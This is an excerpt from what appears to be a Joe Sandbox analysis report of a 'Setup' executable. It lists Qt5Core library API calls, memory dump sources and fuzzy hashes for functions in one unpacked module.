                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F41B8
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F41C6
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F41D2
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F41DE
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4248
                                                                                                                                                              • ?realloc@QListData@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4252
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F425D
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F426B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F429D
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F42B3
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F432E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4338
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4342
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F43A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?end@$String@@$?dispose@Data@1@@$?detach@?realloc@?size@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3180553871-0
                                                                                                                                                              • Opcode ID: 7f08835d1e33d6233f06fe46d745d3fd82a19b79c4bb314584fa47a47f25809b
                                                                                                                                                              • Instruction ID: fe33c872db855c5882d0e1f4ff98e1a0c2fbbdf4025ea424098bc9c27fd2c3eb
                                                                                                                                                              • Opcode Fuzzy Hash: 7f08835d1e33d6233f06fe46d745d3fd82a19b79c4bb314584fa47a47f25809b
                                                                                                                                                              • Instruction Fuzzy Hash: C06165B6A0A64296EB929F75D8441BD23A1FF84B98F448031DE1E47754EF3CE44ACF40
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F78D3
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F78E1
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F78EF
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7908
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7915
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7922
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F792F
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F69AC
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA19F69C5
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F69D1
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F69E3
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F6A27
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F6A33
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA19F6AB7
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F6AC0
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F79CD
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F79D8
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F79E4
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F79F0
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7A2A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7A35
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7A40
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7AA4
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$String@@$Array@@ByteV0@@$?dispose@?end@Data@1@Data@1@@$?detach@?detach_grow@BasicTimer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1320409717-0
                                                                                                                                                              • Opcode ID: 67a2e2b7b63446b59f839015a29955ef8488809d1cde54a2a87bc21edffcac82
                                                                                                                                                              • Instruction ID: 1c8b867772de71be940932a3d61de11c513b4af2809cb5ad89fa7bbe0a86fb7e
                                                                                                                                                              • Opcode Fuzzy Hash: 67a2e2b7b63446b59f839015a29955ef8488809d1cde54a2a87bc21edffcac82
                                                                                                                                                              • Instruction Fuzzy Hash: 196173B2A0AB4296EB55CF75E8400A973A1FB84BA8F444136DE5E47764EF3CD50ACF00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateString@@$Data@@HashTime@@$?size@Array@@Byte$?data@Char@@$?current?detach_helper@?free?free_helper@?hasHash@@Node@Node@1@Node@1@@Shrunk@TimeUtc@V0@@memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 405903728-0
                                                                                                                                                              • Opcode ID: 45cecd103bca49c4549ce1f700e9ac7d9a6a12254178e5e273f8a9bf37a208dd
                                                                                                                                                              • Instruction ID: 0c5216bed6acaf5cf24140c54ba2366249165f081e731bc92e0e298e0d3af96c
                                                                                                                                                              • Opcode Fuzzy Hash: 45cecd103bca49c4549ce1f700e9ac7d9a6a12254178e5e273f8a9bf37a208dd
                                                                                                                                                              • Instruction Fuzzy Hash: 45515B7270AB5682EB91EB21E44416E7769FF84B95F854032DE5E07B64DF3CE446CB00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$?allocate@AllocationData@@@@@Flags@Option@U1@_$Close$Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2670224757-0
                                                                                                                                                              • Opcode ID: 69718d4976ff1eed2c1284e56e1815be2ae1022d3ffd9c021265f14fe969a510
                                                                                                                                                              • Instruction ID: 760e2d13b83ae10dcf9a895b79d6a74f7c078fa8d361b149720a9d62590adf7d
                                                                                                                                                              • Opcode Fuzzy Hash: 69718d4976ff1eed2c1284e56e1815be2ae1022d3ffd9c021265f14fe969a510
                                                                                                                                                              • Instruction Fuzzy Hash: A261A2B2B0AA9192D791DB25D4845BC77A5FB84B90F4AC532CE2E07754EF3CD885CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975314
                                                                                                                                                              • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA197532B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975337
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975349
                                                                                                                                                                • Part of subcall function 00007FFBA1977E70: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197308E,?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1977EB7
                                                                                                                                                                • Part of subcall function 00007FFBA1977E70: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197308E,?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1977EC5
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA197536C
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975378
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA19753AA
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA19753B8
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975406
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1975428
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1975436
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ?append@QListData@@QEAAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975457
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1977E48
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1977E56
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteData@@ListV0@@$?begin@$?append@?detach_grow@?end@Data@1@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 724226085-0
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$String@@@$Variant@@$Latin1
                                                                                                                                                              • String ID: ActiveConfiguration$UserChoiceConfiguration
                                                                                                                                                              • API String ID: 3206264438-461075109
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@ByteV0@@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2885984698-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@ByteV0@@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2885984698-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA1974DB2
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA1974DCC
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA1974DE6
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA1974E00
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?disconnect@D01@Object@@
                                                                                                                                                              • String ID: 1_q_networkSessionClosed()$1_q_networkSessionFailed(QNetworkSession::SessionError)$1_q_networkSessionStateChanged(QNetworkSession::State)$2closed()$2error(QNetworkSession::SessionError)$2networkSessionConnected()$2opened()$2stateChanged(QNetworkSession::State)
                                                                                                                                                              • API String ID: 3920890631-3007809043
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Variant@@$Url@@$Char@@@Data@@FormattingHash$?allocate?arg@?translate@?willApplication@@Char@@ComponentCoreFlags@Grow@Latin1Node@Option@Option@2@@@@String@V0@@Valid@
                                                                                                                                                              • String ID: Error opening %1$QNetworkAccessCacheBackend
                                                                                                                                                              • API String ID: 63760815-565378317
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@Hash$?free_helper@Node@1@@$Node@1@$?detach_helper@$Node@$?clear@?first?next?stop@Array@@BasicByteTimer@@U21@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4263578371-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$String@@$?data@?dispose@?size@Char@@Data@1@@$?append@?detach_grow@?end@Data@1@Locker@@Mutex
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3931562247-0
                                                                                                                                                              • Opcode ID: 660d62944f6d8fde6f9784eda0aac9ca83d54d43f435545db0accc9a829ffefc
                                                                                                                                                              • Instruction ID: 087e49b987998ac5de80f91bcda1772de4603555f4f9e88c7b3922b011687838
                                                                                                                                                              • Opcode Fuzzy Hash: 660d62944f6d8fde6f9784eda0aac9ca83d54d43f435545db0accc9a829ffefc
                                                                                                                                                              • Instruction Fuzzy Hash: 9061BFB6B0AA4282DFA29B35E8502BA6361FF81BA5F844532DD6E07755EF3CD445CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,?,00007FFBA1984490,?,?,?,?,?,?,?,00007FFBA19845BD), ref: 00007FFBA1983BC6
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983BD3
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983BDF
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983C16
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983C36
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983C77
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983C84
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983CB7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983CC7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983CE1
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983CFA
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983D0A
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983D29
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?nextData@@HashNode@Node@1@U21@@$V0@@Variant@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3767166643-0
                                                                                                                                                              • Opcode ID: ad98c6eecb9ee1fd04a8e5c978fa9a86e3ba56a70daff592a4b1caa25bbad96a
                                                                                                                                                              • Instruction ID: f684809647348d1c1e922ac50dc94656f45847253d39a278d645e59064797b61
                                                                                                                                                              • Opcode Fuzzy Hash: ad98c6eecb9ee1fd04a8e5c978fa9a86e3ba56a70daff592a4b1caa25bbad96a
                                                                                                                                                              • Instruction Fuzzy Hash: 695171A1B0B75686EF929F33E5001B963A8BB45BA8F484432CD1E07754EE7CE597CB04
                                                                                                                                                              APIs
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6BF6
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6C03
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6C0F
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6C46
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6C66
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6CA7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6CB4
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6CE7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6CF7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6D11
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6D2A
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6D3A
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6D59
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?nextData@@HashNode@Node@1@U21@@$V0@@Variant@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3767166643-0
                                                                                                                                                              • Opcode ID: c28fc3219e4b3544a0e569a618e23b9618007193c1aeaec57ab7ae5c698e9b4d
                                                                                                                                                              • Instruction ID: ea3dfcefe71229e421792dea648b36859cd8e33072e9ed1da28943febba3a4b6
                                                                                                                                                              • Opcode Fuzzy Hash: c28fc3219e4b3544a0e569a618e23b9618007193c1aeaec57ab7ae5c698e9b4d
                                                                                                                                                              • Instruction Fuzzy Hash: 7A515EB1A0B75685EF92DB22E90417957A4FB55BA8F880431CE0E07794EE7DE4D7CB00
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@$List$Array@@Byte$?begin@$?end@?free_helper@HashNode@1@@V0@@$?detach@?dispose@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3972227432-0
                                                                                                                                                              • Opcode ID: 54f1315e859e4faa892255347accfa2a6b2713dd9733f87fc4beb4f8ccc412d3
                                                                                                                                                              • Instruction ID: ce19358116c1bcdfcd270e8eb31f97e1c9ceaed19fcf75be88ea17d527848bc6
                                                                                                                                                              • Opcode Fuzzy Hash: 54f1315e859e4faa892255347accfa2a6b2713dd9733f87fc4beb4f8ccc412d3
                                                                                                                                                              • Instruction Fuzzy Hash: 155171B6A0AB4286EF91DF25E84017863A1FB84BA4F484436DE5D4B754EF7CE456CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6CDF
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6CED
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6CFB
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6D09
                                                                                                                                                                • Part of subcall function 00007FFBA19B4E30: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA19B4EFA
                                                                                                                                                                • Part of subcall function 00007FFBA19B4E30: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA19B4F2A
                                                                                                                                                                • Part of subcall function 00007FFBA19B4E30: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA19B4F7D
                                                                                                                                                                • Part of subcall function 00007FFBA19B4E30: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA19B4FAC
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6D50
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6D5E
